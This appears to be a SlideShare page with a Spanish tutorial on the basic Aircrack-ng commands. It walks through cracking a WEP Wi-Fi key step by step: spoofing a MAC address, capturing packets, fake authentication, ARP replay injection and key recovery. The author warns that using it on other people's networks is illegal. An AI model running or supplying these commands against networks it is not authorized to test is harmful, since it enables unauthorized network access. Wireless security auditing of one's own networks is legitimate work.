Aircrack ng: comandos básicos
Upcoming SlideShare
Loading in...5
×
 

Aircrack ng: comandos básicos

on

  • 1,105 views

 

Statistics

Views

Total Views
1,105
Views on SlideShare
1,105
Embed Views
0

Actions

Likes
0
Downloads
43
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as OpenOffice

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Aircrack ng: comandos básicos Aircrack ng: comandos básicos Document Transcript

  • Aircrack-ng: Comandos básicosPosted: marzo 11, 2009 in General, GNU/Linux, Manuales/How-To, SeguridadEtiquetas: Aircrack, Aireplay, Airodump, ataque redes, crack WEP, GNU/Linux, WEP, wep vulnerable, WPA, WPA2-PSK9 Aircrack-ng es una suite de programas para la auditoríade redes inalámbricas.¿Para qué es utilizado?. Sin duda ha logrado su éxito para realizar ataques a redes inalámbricas ajenascon el objetivo de obtener la contraseña del router para poder acceder a internet entre otras cosas.Esta acción es ILEGAL.Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las más fácilesde descifrar y por error para el usuario de una conexión la más común.Por ello es recomendable no usar encriptación WEP al serfácilmente vulnerable.Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.¿Qué necesito para usar Aircrack-ng?.Es necesario tener una tarjeta de red inalámbrica compatible con airodump-ng (ver lista decompatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la redatacada para poder descifrar la clave.Los programas en cuestión que trae Aircrack-ng así como macchanger.¿Qué es recomendado tener para usar Aircrack-ng?Es recomendable que nuestra tarjeta sea compatible con Aireplay-ng (ver lista de compatibilidad).Aireplay-ng es el programa de inyección de paquetes. Éste programa generará más tráfico en la red ypor tanto capturaremos más paquetes en mucho menos tiempo.Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremospoder inyectar paquetes es necesario que usemos alguna distribución GNU/Linux. Hay que mencionar
  • que hay distribuciones específicas que contienen ya Aircrack-ng así como más programas yutilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB,ésto significa que no es necesario instalarlos en nuestra máquina, basta con grabarlos en un CD o USBe iniciar la máquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax,WifiWay…¿Cómo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB?Si optas por instalar Aircrack-ng en tu Sistema Operativo puedes pasarte por su web de descargas.Aircrack-ng DownloadsEn Ubuntu, que es la distribución que uso yo: sudo apt-get install aircrack-ngPara instalar Macchanger, puedes pasarte por su webMacchanger DownloadsEn Ubuntu: sudo apt-get install macchangerYa que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, osvoy a dejar unos comando básicos para hacer un ataque a una red con encriptacion WEP conclientes asociados. Ten en cuenta que hacer este proceso a una red ajena a la propia es ILEGAL.Prueba con tu red y verás que fácil es de vulnerar.Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios.Este comando varía según la distribución GNU/Linux que usemos. sudo su*** Preparación de la tarjeta airmon-ng>>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0,wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500. airmon-ng stop ra0>>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado. ifconfig ra0 down>>tarjeta de red desactiva: no sale nada por pantalla. macchanger –mac 00:11:22:33:44:55 ra0>>Current mac: xx:xx:xx:xx:xx:xx Fake mac:00:11:22:33:44:55: nos da la mac original y la falsaque hemos nos hemos asignado para luego poder inyectar paquetes. airmon-ng start ra0
  • >>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturarpaquetes)*** Escaneo de redes y clientes asociados airodump-ng ra0>>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la informacióncomo canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas alas redes. Así que elegimos una que tenga buena señal (que vaya capturando #data y tenga buen PWR)apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecución del comando pulsando“Control+C”, o cerrando y abriendo otra terminal. airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado: airodump-ng-c 11 -w capturaswifi – - bssid 00:01:02:03:04:C1>>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y losclientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LACIERRES!!!*** Inyección de paquetes para agilizar el proceso de capturas de paquetesAbre una nueva terminal (consola) con privilegios de superusuario(root) como antes. aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0>>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en elcomando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y elnombre que tiene la red atacada, es decir, la ESSID. Es importante que nos salga el AssociationSuccesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0. aireplay-ng -3 –b BSID –h 00:11:22:33:44:55 ra0>>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que lainyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b00:01:02:03:04:05 -h 00:11:22:33:44:55 ra0. Ahora dejamos que siga inyectando paquetes, por tantoNO CIERRES ESTA TERMINAL!!!*** Crackeo WEPPara poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número depaquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis aintentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemosmás de 25.000 #data recogidos.Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes. aircrack-ng –b BSSID ArchivoDeCapturas.cap>>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos,y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo
  • volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y laclave en hexadecimal normalmente.